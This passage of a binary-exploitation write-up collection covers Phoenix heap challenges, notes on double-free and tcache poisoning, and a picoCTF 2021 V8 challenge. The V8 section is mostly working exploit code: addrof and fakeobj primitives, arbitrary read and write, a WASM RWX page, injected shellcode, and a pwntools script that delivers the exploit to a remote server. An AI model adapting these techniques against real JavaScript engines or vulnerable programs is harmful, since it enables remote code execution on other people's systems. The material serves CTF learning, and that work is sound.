So, fairly simple - 80 characters, then the address of winner.

Exploit

We need to remove the null bytes because argv doesn't allow them

heap1

http://exploit.education/phoenix/heap-one/

Source

Analysis

This program:

Allocates a chunk on the heap for the heapStructure
Allocates another chunk on the heap for the name of that heapStructure
Repeats the process with another heapStructure
Copies the two command-line arguments to the name variables of the heapStructures
Prints something

Regular Execution

Let's break on and after the first strcpy.

As we expected, we have two pairs of heapStructure and name chunks. We know the strcpy will be copying into wherever name points, so let's read the contents of the first heapStructure. Maybe this will give us a clue.

Look! The name pointer points to the name chunk! You can see the value 0x602030 being stored.

This isn't particularly a revelation in itself - after all, we knew there was a pointer in the chunk. But now we're certain, and we can definitely overwrite this pointer due to the lack of bounds checking. And because we can also control the value being written, this essentially gives us an arbitrary write!

And where better to target than the GOT?

Exploitation

The plan, therefore, becomes:

Pad until the location of the pointer
Overwrite the pointer with the GOT address of a function
Set the second parameter to the address of winner
Next time the function is called, it will call winner

But what function should we overwrite? The only function called after the strcpy is printf, according to the source code. And if we overwrite printf with winner it'll just recursively call itself forever.

Luckily, compilers like gcc compile printf as puts if there are no parameters - we can see this with radare2:

So we can simply overwrite the GOT address of puts with winner. All we need to find now is the padding until the pointer and then we're good to go.

Break on and after the strcpy again and analyse the second chunk's name pointer.

The pointer is originally at 0x8d9050; once the strcpy occurs, the value there is 0x41415041414f4141.

The offset is 40.

Final Exploit

Again, null bytes aren't allowed in parameters so you have to remove them.

Use-After-Free

Much like the name suggests, this technique involves us using data once it is freed. The weakness here is that programmers often wrongly assume that once the chunk is freed it cannot be used and don't bother writing checks to ensure data is not freed. This means it is possible to write data to a free chunk, which is very dangerous.

TODO: binary

Double-Free

Overview

A double-free can take a bit of time to understand, but ultimately it is very simple.

Firstly, remember that for fast chunks in the fastbin, the location of the next chunk in the bin is specified by the fd pointer. This means if chunk a points to chunk b, once chunk a is freed the next chunk in the bin is chunk b.

In a double-free, we attempt to control fd. By overwriting it with an arbitrary memory address, we can tell malloc() where the next chunk is to be allocated. For example, say we overwrote a->fd to point at 0x12345678; once a is free, the next chunk on the list will be 0x12345678.

Controlling fd

As it sounds, we have to free the chunk twice. But how does that help?

Let's watch the progress of the fastbin if we free an arbitrary chunk a twice:

Fairly logical.

But what happens if we called malloc() again for the same size?

Well, strange things would happen. a is both allocated (in the form of b) and free at the same time.

If you remember, the heap attempts to save as much space as possible and when the chunk is free the fd pointer is written where the user data used to be.

But what does this mean?

When we write into the use data of b, we're writing into the fd of a at the same time.

And remember - controlling fd means we can control where the next chunk gets allocated!

So we can write an address into the data of b, and that's where the next chunk gets placed.

Now, the next alloc will return a again. This doesn't matter, we want the one afterwards.

Boom - an arbitrary write.

Double-Free Protections

It wouldn't be fun if there were no protections, right?

Using Xenial Xerus, try running:

#include <stdio.h>
#include <stdlib.h>

int main() {
    int *a = malloc(0x50);

    free(a);
    free(a);
    
    return 1;
}

Notice that it throws an error.

Double Free or Corruption (Fasttop)

Is the chunk at the top of the bin the same as the chunk being inserted?

For example, the following code still works:

#include <stdio.h>
#include <stdlib.h>

int main() {
    int *a = malloc(0x50);
    int *b = malloc(0x50);

    free(a);
    free(b);
    free(a);
    
    return 1;
}

malloc(): memory corruption (fast)

When removing the chunk from a fastbin, make sure the size falls into the fastbin's range

The previous protection could be bypassed by freeing another chunk in between the double-free and just doing a bit more work that way, but then you fall into this trap.

Namely, if you overwrite fd with something like 0x08041234, you have to make sure the metadata fits - i.e. the size ahead of the data is completely correct - and that makes it harder, because you can't just write into the GOT, unless you get lucky.

Tcache: calloc()

Tcache Poisoning

Reintroducing double-frees

Tcache poisoning is a fancy name for a double-free in the tcache chunks.

Reverse Engineering

picoCTF 2021 - Download Horsepower

Another OOB, but with pointer compression

Analysis

server.py is the same as in Kit Engine - send it a JS file, it gets run.

Let's check the patch again:

diff --git a/BUILD.gn b/BUILD.gn
index 9482b977e3..6a3f1e2d0f 100644
--- a/BUILD.gn
+++ b/BUILD.gn
@@ -1175,6 +1175,7 @@ action("postmortem-metadata") {
 }
 
 torque_files = [
+  "src/builtins/array-horsepower.tq",
   "src/builtins/aggregate-error.tq",
   "src/builtins/array-at.tq",
   "src/builtins/array-copywithin.tq",
diff --git a/src/builtins/array-horsepower.tq b/src/builtins/array-horsepower.tq
new file mode 100644
index 0000000000..7ea53ca306
--- /dev/null
+++ b/src/builtins/array-horsepower.tq
@@ -0,0 +1,17 @@
+// Gotta go fast!!
+
+namespace array {
+
+transitioning javascript builtin
+ArraySetHorsepower(
+  js-implicit context: NativeContext, receiver: JSAny)(horsepower: JSAny): JSAny {
+    try {
+      const h: Smi = Cast<Smi>(horsepower) otherwise End;
+      const a: JSArray = Cast<JSArray>(receiver) otherwise End;
+      a.SetLength(h);
+    } label End {
+        Print("Improper attempt to set horsepower");
+    }
+    return receiver;
+}
+}
\ No newline at end of file
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index e6fb20d152..abfb553864 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -999,6 +999,10 @@ void Shell::ModuleResolutionSuccessCallback(
   resolver->Resolve(realm, module_namespace).ToChecked();
 }
 
+void Shell::Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args) {
+  __asm__("int3");
+}
+
 void Shell::ModuleResolutionFailureCallback(
     const FunctionCallbackInfo<Value>& info) {
   std::unique_ptr<ModuleResolutionData> module_resolution_data(
@@ -2201,40 +2205,14 @@ Local<String> Shell::Stringify(Isolate* isolate, Local<Value> value) {
 
 Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
   Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
-  global_template->Set(Symbol::GetToStringTag(isolate),
-                       String::NewFromUtf8Literal(isolate, "global"));
+  // Remove some unintented solutions
+  global_template->Set(isolate, "Breakpoint", FunctionTemplate::New(isolate, Breakpoint));
   global_template->Set(isolate, "version",
                        FunctionTemplate::New(isolate, Version));
-
   global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
-  global_template->Set(isolate, "printErr",
-                       FunctionTemplate::New(isolate, PrintErr));
-  global_template->Set(isolate, "write", FunctionTemplate::New(isolate, Write));
-  global_template->Set(isolate, "read", FunctionTemplate::New(isolate, Read));
-  global_template->Set(isolate, "readbuffer",
-                       FunctionTemplate::New(isolate, ReadBuffer));
-  global_template->Set(isolate, "readline",
-                       FunctionTemplate::New(isolate, ReadLine));
-  global_template->Set(isolate, "load", FunctionTemplate::New(isolate, Load));
-  global_template->Set(isolate, "setTimeout",
-                       FunctionTemplate::New(isolate, SetTimeout));
-  // Some Emscripten-generated code tries to call 'quit', which in turn would
-  // call C's exit(). This would lead to memory leaks, because there is no way
-  // we can terminate cleanly then, so we need a way to hide 'quit'.
   if (!options.omit_quit) {
     global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
   }
-  global_template->Set(isolate, "testRunner",
-                       Shell::CreateTestRunnerTemplate(isolate));
-  global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
-  global_template->Set(isolate, "performance",
-                       Shell::CreatePerformanceTemplate(isolate));
-  global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
-  // Prevent fuzzers from creating side effects.
-  if (!i::FLAG_fuzzing) {
-    global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
-  }
-  global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
 
 #ifdef V8_FUZZILLI
   global_template->Set(
@@ -2243,11 +2221,6 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
       FunctionTemplate::New(isolate, Fuzzilli), PropertyAttribute::DontEnum);
 #endif  // V8_FUZZILLI
 
-  if (i::FLAG_expose_async_hooks) {
-    global_template->Set(isolate, "async_hooks",
-                         Shell::CreateAsyncHookTemplate(isolate));
-  }
-
   return global_template;
 }
 
@@ -2449,10 +2422,10 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
             v8::Isolate::kMessageLog);
   }
 
-  isolate->SetHostImportModuleDynamicallyCallback(
+  /*isolate->SetHostImportModuleDynamicallyCallback(
       Shell::HostImportModuleDynamically);
   isolate->SetHostInitializeImportMetaObjectCallback(
-      Shell::HostInitializeImportMetaObject);
+      Shell::HostInitializeImportMetaObject);*/
 
 #ifdef V8_FUZZILLI
   // Let the parent process (Fuzzilli) know we are ready.
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a6a1037cff..7cf66d285a 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -413,6 +413,8 @@ class Shell : public i::AllStatic {
     kNoProcessMessageQueue = false
   };
 
+  static void Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args);
+
   static bool ExecuteString(Isolate* isolate, Local<String> source,
                             Local<Value> name, PrintResult print_result,
                             ReportExceptions report_exceptions,
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index ce3886e87e..6621a79618 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -1754,6 +1754,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
     JSObject::AddProperty(isolate_, proto, factory->constructor_string(),
                           array_function, DONT_ENUM);
 
+    SimpleInstallFunction(isolate_, proto, "setHorsepower",
+                          Builtins::kArraySetHorsepower, 1, false);
     SimpleInstallFunction(isolate_, proto, "concat", Builtins::kArrayConcat, 1,
                           false);
     SimpleInstallFunction(isolate_, proto, "copyWithin",
diff --git a/src/objects/js-array.tq b/src/objects/js-array.tq
index b18f5bafac..b466b330cd 100644
--- a/src/objects/js-array.tq
+++ b/src/objects/js-array.tq
@@ -28,6 +28,9 @@ extern class JSArray extends JSObject {
   macro IsEmpty(): bool {
     return this.length == 0;
   }
+  macro SetLength(l: Smi) {
+    this.length = l;
+  }
   length: Number;
 }

The only really relevant code is here:

ArraySetHorsepower(js-implicit context: NativeContext, receiver: JSAny)(horsepower: JSAny): JSAny {
    try {
        const h: Smi = Cast<Smi>(horsepower) otherwise End;
        const a: JSArray = Cast<JSArray>(receiver) otherwise End;
        a.SetLength(h);
    } label End {
        Print("Improper attempt to set horsepower");
    }
    return receiver;
}

macro SetLength(l: Smi) {
    this.length = l;
}

SimpleInstallFunction(isolate_, proto, "setHorsepower",
    Builtins::kArraySetHorsepower, 1, false);

We can essentially set the length of an array by using .setHorsepower(). By setting it to a larger value, we can get an OOB read and write, from which point it would be very similar to the oob-v8 writeup.

Understanding the Memory Layout

Let's first try and check the OOB works as we expected. We're gonna create an exploit.js with the classic ftoi() and itof() functions:

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

Then load up d8 under GDB. This version is a lot newer than the one from OOB-V8, so let's work out what is what.

$gdb d8
gef➤  run --allow-natives-syntax --shell exploit.js
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> %DebugPrint(a)
DebugPrint: 0xa5e08085179: [JSArray]
 - map: 0x0a5e082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x0a5e0820ab61 <JSArray[0]>
 - elements: 0x0a5e08085161 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
 - length: 2
 - properties: 0x0a5e0804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0xa5e080446d1: [String] in ReadOnlySpace: #length: 0x0a5e0818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x0a5e08085161 <FixedDoubleArray[2]> {
           0: 1.5
           1: 2.5
 }
0xa5e082439f1: [Map]
 - type: JS_ARRAY_TYPE
 - instance size: 16
 - inobject properties: 0
 - elements kind: PACKED_DOUBLE_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - back pointer: 0x0a5e082439c9 <Map(HOLEY_SMI_ELEMENTS)>
 - prototype_validity cell: 0x0a5e08182405 <Cell value= 1>
 - instance descriptors #1: 0x0a5e0820b031 <DescriptorArray[1]>
 - transitions #1: 0x0a5e0820b07d <TransitionArray[4]>Transition array #1:
     0x0a5e08044fd5 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x0a5e08243a19 <Map(HOLEY_DOUBLE_ELEMENTS)>

 - prototype: 0x0a5e0820ab61 <JSArray[0]>
 - constructor: 0x0a5e0820a8f1 <JSFunction Array (sfi = 0xa5e0818ac31)>
 - dependent code: 0x0a5e080421b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
 - construction counter: 0

[1.5, 2.5]
gef➤  x/10gx 0xa5e08085179-1       <--- -1 needed due to pointer tagging!
0xa5e08085178:	0x0804222d082439f1	0x0000000408085161
0xa5e08085188:	0x58f55236080425a9	0x7566280a00000adc
0xa5e08085198:	0x29286e6f6974636e	0x20657375220a7b20
0xa5e080851a8:	0x3b22746369727473	0x6d2041202f2f0a0a
0xa5e080851b8:	0x76696e752065726f	0x7473206c61737265

Types and their Representation

So, right of the bat there are some differences. For example, look at the first value 0x0804222d082439f1. What on earth is that? Well, if you have eagle eyes or are familiar with a new V8 feature called pointer compression, you may notice that it lines up with the properties and the map:

 - map: 0x0a5e082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - properties: 0x0a5e0804222d <FixedArray[0]>

Notice that the last 4 bytes are being stored in that value 0x0804222d082439f1 - the first 4 bytes here at the last 4 bytes of the properties location, and the last 4 bytes are the last 4 of the map pointer.

This is a new feature added to V8 in 2020 called pointer compression, where the first 4 bytes of pointers are not stored as they are constant for all pointers - instead, a single reference is saved, and only the lower 4 bytes are stored. The higher 4 bytes, known as the isolate root, are stored in the R13 register. More information can be found in this blog post, but it's made a huge difference to performance. As well as pointers, smis have also changed representation - instead of being 32-bit values left-shifted by 32 bits to differentiate them from pointers, they are now simply doubled (left-shifted by one bit) and therefore also stored in 32-bit space.

A double is stored as its 64-bit binary representation
An smi is a 32-bit number, but it's stored as itself left-shifted by 1 so the bottom bit is null
- e.g. 0x12345678 is stored as 0x2468acf0
A pointer to an address addr is stored as addr | 1, that is the least significant bit is set to 1.
- e.g. 0x12345678 is stored as 0x12345679
- This helps differentiate it from an smi, but not from a double!

We can see the example of an smi in the second value from the x/10gx command above: 0x0000000408085161. The upper 4 bytes are 4, which is double 2, so this is the length of the list. The lower 4 bytes correspond to the pointer to the elements array, which stores the values themselves. Let's double-check that:

gef➤  x/4gx 0x0a5e08085161-1
0xa5e08085160:	0x0000000408042a99	0x3ff8000000000000
0xa5e08085170:	0x4004000000000000	0x0804222d082439f1

The first value 0x0000000408042a99 is the length smi (a value of 2, doubled as it's an smi) followed by what I assume is a pointer to the map. That's not important - what's important is the next two values are the floating-point representations of 1.5 and 2.5 (I recognise them from oob-v8!), while the value directly after is 0x0804222d082439f1, the properties and map pointer. This means our OOB can work as planned! We just have to ensure we preserve the top 32 bits of this value so we don't ruin the properties pointer.

Note that we don't know the upper 4 bytes, but that's not important!

Let's test that the OOB works as we expected by calling setHorsepower() on an array, and reading past the end.

d8> a.setHorsepower(5)
[1.5, 2.5, , , ]
d8> a[2]
4.763796150676345e-270
d8> ftoi(a[2]).toString(16)
"804222d082439f1"

Fantastic!

Complications while Grabbing Maps

This is a bit more complicated than in oob-v8, because of one simple fact: last time, we gained an addrof primitive using this:

var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr.oob(map_float);		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr.oob(map_obj);		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

In our current scenario, you could argue that we can reuse this (with minor modifications) and get this:

var float_arr = [1.5, 2.5];
float_arr.setHorsepower(3);
var map_float = float_arr[2];

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(2);
var map_obj = obj_arr[1];

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr[1] = map_float;		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr[1] = map_obj;		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

However, this does not work. Why? It's the difference between these two lines:

var map_obj = obj_arr.oob();
var map_obj = obj_arr[1];

In oob-v8, we noted that the function .oob() not only reads an index past the end, but it also returns it as a double. And that's the key difference - in this challenge, we can read past the end of the array, but this time it's treated as an object. obj_arr[1] will, therefore, return an object - and a pretty invalid one, at that!

You might be thinking that we don't need the object map to get an addrof primitive at all, we just can't set the map back, but we can create a one-use array. I spent an age working out why it didn't work, instead returning a NaN, but of course it was this line:

obj_arr[1] = map_float;

Setting the map to that of a float array would never work, as it would treat the first index like an object again!

A new addrof()

So, this time we can't copy the object map so easily. But not all is lost! Instead of having a single OOB read/write, we can set the array to have a huge length. This way, we can use an OOB on the float array to read the map of the object array - if we set it correctly, that is.

Aligning Memory

Let's create two arrays, one of floats and one of objects. We'll also grab the float map (which will also contain the properties pointer!) while we're at it.

var float_arr = [1.5, 2.5];
float_arr.setHorsepower(50);
var float_map = float_arr[2];             // both map and properties


var initial_obj = {a:1};	          // placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(50);

My initial thought was to create an array like this:

var obj_arr = [3.5, 3.5, initial_obj];

And then I could slowly increment the index of float_arr, reading along in memory until we came across two 3.5 values in a row. I would then know that the location directly after was our desired object, making a reliable leak. Unfortunately, while debugging, it seems like mixed arrays are not quite that simple (unsurprisingly, perhaps). Instead, I'm gonna hope and pray that the offset is constant (and if it's not, we'll come back and play with the mixed array further).

Let's determine the offset. I'm gonna %DebugPrint float_arr, obj_arr and initial_obj:

DebugPrint: 0x30e008085931: [JSArray]
 - map: 0x30e0082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x30e00820ab61 <JSArray[0]>
 - elements: 0x30e008085919 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
 - length: 50
 - properties: 0x30e00804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x30e0080446d1: [String] in ReadOnlySpace: #length: 0x30e00818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x30e008085919 <FixedDoubleArray[2]> {
           0: 1.5
           1: 2.5
 }
DebugPrint: 0x30e008085985: [JSArray]
 - map: 0x30e008243a41 <Map(PACKED_ELEMENTS)> [FastProperties]
 - prototype: 0x30e00820ab61 <JSArray[0]>
 - elements: 0x30e008085979 <FixedArray[1]> [PACKED_ELEMENTS]
 - length: 50
 - properties: 0x30e00804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x30e0080446d1: [String] in ReadOnlySpace: #length: 0x30e00818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x30e008085979 <FixedArray[1]> {
           0: 0x30e00808594d <Object map = 0x30e0082459f9>
 }

DebugPrint: 0x30e00808594d: [JS_OBJECT_TYPE]
 - map: 0x30e0082459f9 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x30e008202f11 <Object map = 0x30e0082421b9>
 - elements: 0x30e00804222d <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x30e00804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x30e0080477ed: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
 }

Let's check the obj_arr first:

gef➤  x/6gx 0x30e008085979-1
0x30e008085978:	0x0000000208042205	0x08243a410808594d
0x30e008085988:	0x080859790804222d	0x080425a900000064
0x30e008085998:	0x0000000400000003	0x0000000029386428

In line with what we get from %DebugPrint(), we get the lower 4 bytes of 0808594d. If we print from elements onwards for the float_arr:

gef➤  x/20gx 0x30e008085919-1 
0x30e008085918:	0x0000000408042a99	0x3ff8000000000000
0x30e008085928:	0x4004000000000000	0x0804222d082439f1
0x30e008085938:	0x0000006408085919	0x082439f1080423d1
0x30e008085948:	0x082459f90804222d	0x0804222d0804222d
0x30e008085958:	0x08045a0100000002	0x0000000000010001
0x30e008085968:	0x080477ed080421f9	0x0000000200000088
0x30e008085978:	0x0000000208042205	0x08243a410808594d
0x30e008085988:	0x080859790804222d	0x080425a900000064
0x30e008085998:	0x0000000400000003	0x0000000029386428
0x30e0080859a8:	0x0000000000000000	0x0000000000000000

We can see the value 0x08243a410808594d at 0x30e008085980. If the value 1.5 at 0x22f908085370 is index 0, we can count and get an index of 12. Let's try that:

function addrof(obj) {
    obj_arr[0] = obj;
    let leak = float_arr[12];
    return ftoi(leak);
}

%DebugPrint(initial_obj);
console.log("Leak: 0x" + addrof(initial_obj).toString(16))

And from the output, it looks very promising!

Leak: 0x8243a410808593d
DebugPrint: 0x28a60808593d: [JS_OBJECT_TYPE]
 - map: 0x28a6082459f9 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x28a608202f11 <Object map = 0x28a6082421b9>
 - elements: 0x28a60804222d <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x28a60804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x28a6080477ed: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
 }

The lower 4 bytes match up perfectly. We're gonna return just the last 4 bytes:

return ftoi(leak) & 0xffffffffn;

And bam, we have an addrof() primitive. Time to get a fakeobj().

A new fakeobj()

If we follow the same principle for fakeobj() :

function fakeobj(compressed_addr) {
    float_arr[12] = itof(compressed_addr);
    return obj_arr[0];
}

However, remember that pointer compression is a thing! We have to make sure the upper 4 bytes are consistent. This isn't too bad, as we can read it once and remember it for all future sets:

// store upper 4 bytes of leak
let upper = ftoi(float_arr[12]) & (0xffffffffn << 32n);

And then fakeobj() becomes

function fakeobj(compressed_addr) {
    float_arr[12] = itof(upper + compressed_addr);
    return obj_arr[0];
}

We can test this with the following code:

// first leak the address
let addr_initial = addrof(initial_obj);
// now try and create an object from it
let fake = fakeobj(addr_initial);
// fake should now be pointing to initial_obj
// meaning fake.a should be 1
console.log(fake.a);

If I run this, it does in fact print 1:

gef➤  run --allow-natives-syntax --shell exploit.js
1
V8 version 9.1.0 (candidate)
d8>

I was as impressed as anybody that this actually worked, I can't lie.

Arbitrary Read

Once again, we're gonna try and gain an arbitrary read by creating a fake array object that we can control the elements pointer for. The offsets are gonna be slightly different due to pointer compression. As we saw earlier, the first 8 bytes are the compressed pointer for properties and map, while the second 8 bytes are the smi for length and then the compressed pointer for elements. Let's create an initial arb_rw_array like before, and print out the layout:

var arb_rw_arr = [float_map, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

%DebugPrint(arb_rw_arr)

[+] Address of Arbitrary RW Array: 0x8085a01
DebugPrint: 0x161c08085a01: [JSArray]
 - map: 0x161c082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x161c0820ab61 <JSArray[0]>
 - elements: 0x161c080859d9 <FixedDoubleArray[4]> [PACKED_DOUBLE_ELEMENTS]
 - length: 4
 - properties: 0x161c0804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x161c080446d1: [String] in ReadOnlySpace: #length: 0x161c0818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x161c080859d9 <FixedDoubleArray[4]> {
           0: 4.7638e-270
           1: 1.5
           2: 2.5
           3: 3.5
 }

The leak works perfectly. Once again, elements is ahead of the JSArray itself.

If we want to try and fake an array with compression pointers then we have the following format:

32-bit pointer to properties
32-bit pointer to map
smi for length
32-bit pointer to elements

The first ones we have already solved with float_map. We can fix the latter like this:

function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;

    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array
    // size of 2 and elements pointer
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr);

    // index 0 will returns the arbitrary read value
    return ftoi(fake[0]);
}

We can test the arbitrary read, and I'm going to do this by grabbing the float_map location and reading the data there:

// test arb_read
let float_map_lower = ftoi(float_map) & 0xffffffffn
console.log("Map at: 0x" + float_map_lower.toString(16))
console.log("Read: 0x" + arb_read(float_map_lower).toString(16));

Map at: 0x82439f1
Read: 0xa0007ff2100043d

A little bit of inspection at the location of float_map shows us we're 8 bytes off:

gef➤  x/10gx 0x3f09082439f1-1
0x3f09082439f0:	0x1604040408042119	0x0a0007ff2100043d
0x3f0908243a00:	0x082439c90820ab61	0x080421b90820b031
0x3f0908243a10:	0x0820b07d08182405	0x1604040408042119

This is because the first 8 bytes in the elements array are for the length smi and then for a compressed map pointer, so we just subtract if 8 and get a valid arb_read():

function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;

    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array
    // size of 2 and elements pointer
    // initially with the map and a size smi, so 0x8 offset
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // index 0 will returns the arbitrary read value
    return ftoi(fake[0]);
}

Arbitrary Write

Initial

We can continue with the initial_arb_write() from oob-v8, with a couple of minor changes:

function initial_arb_write(compressed_addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

We can test this super easily too, with the same principle:

let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
initial_arb_write(float_map_lower, 0x12345678n);

Observing the map location in GDB tells us the write worked:

gef➤  x/4gx 0xf84082439f1-1
0xf84082439f0:	0x0000000012345678	0x0a0007ff2100043d
0xf8408243a00:	0x082439c90820ab61	0x080421b90820b031

Full

Last time we improved our technique by usingArrayBuffer backing pointers. This is a bit harder this time because for this approach you need to know the full 64-bit pointers, not just the compressed version. This is genuinely very difficult because the isolate root is stored in the r13 register, not anywhere in memory. As a result, we're going to be using initial_arb_write() as if it's arb_write(), and hoping it works.

If anybody knows of a way to leak the isolate root, please let me know!

Shellcoding

The final step is to shellcode our way through, using the same technique as last time. The offsets are slightly different, but I'm sure that by this point you can find them yourself!

First I'll use any WASM code to create the RWX page, like I did for oob-v8:

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

Again, this generates an RWX page:

gef➤  vmmap
[...]
0x000007106675a000 0x000007106675b000 0x0000000000000000 rwx 
[...]

Using the same technique of printing out the wasm_instance address and comparing it to the output of search-pattern from before:

gef➤  search-pattern 0x000007106675a000
[+] Searching '\x00\xa0\x75\x66\x10\x07\x00\x00' in memory
[+] In (0x3c108200000-0x3c108280000), permission=rw-
  0x3c108211ad4 - 0x3c108211af4  →   "\x00\xa0\x75\x66\x10\x07\x00\x00[...]"
  [...]

I get an offset of 0x67. In reality it is 0x68 (pointer tagging!), but who cares.

Now we can use the ArrayBuffer technique, because we know all the bits of the address! We can just yoink it directly from the oob-v8 writeup (slightly changing 0x20 to 0x14, as that is the new offset with compression):

function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    
    // overwrite the backing store so the 0x100 bytes can be written to where we want
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x14n;
    arb_write(backing_store_addr, addr);

    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
	dataview.setUint32(4*i, shellcode[i], true);
    }
}

I am going to grab the shellcode for cat flag.txt from this writeup, because I suck ass at working out endianness and it's a lot of effort for a fail :)))

payload = [0x0cfe016a, 0x2fb84824, 0x2f6e6962, 0x50746163, 0x68e78948, 0x7478742e, 0x0101b848, 0x01010101, 0x48500101, 0x756062b8, 0x606d6701, 0x04314866, 0x56f63124, 0x485e0c6a, 0x6a56e601, 0x01485e10, 0x894856e6, 0x6ad231e6, 0x050f583b]
copy_shellcode(rwx_base, payload);
f();

Running this:

$ ./d8 exploit.js 
[+] Address of Arbitrary RW Array: 0x8086551
[+] RWX Region located at 0xf06b12a5000
cat: flag.txt: No such file or directory

Ok, epic! Let's deliver it remote using the same script as Kit Engine:

from pwn import *

with open("exploit.js", "rb") as f:
    exploit = f.read()

p = remote('mercury.picoctf.net', 60233)
p.sendlineafter(b'5k:', str(len(exploit)).encode())
p.sendlineafter(b'please!!\n', exploit)

p.recvuntil(b"Stdout b'")
flag = p.recvuntil(b"\\")[:-1]
print(flag.decode())

And we get the flag!

$ python3 deliver.py 
[+] Opening connection to mercury.picoctf.net on port 60233: Done
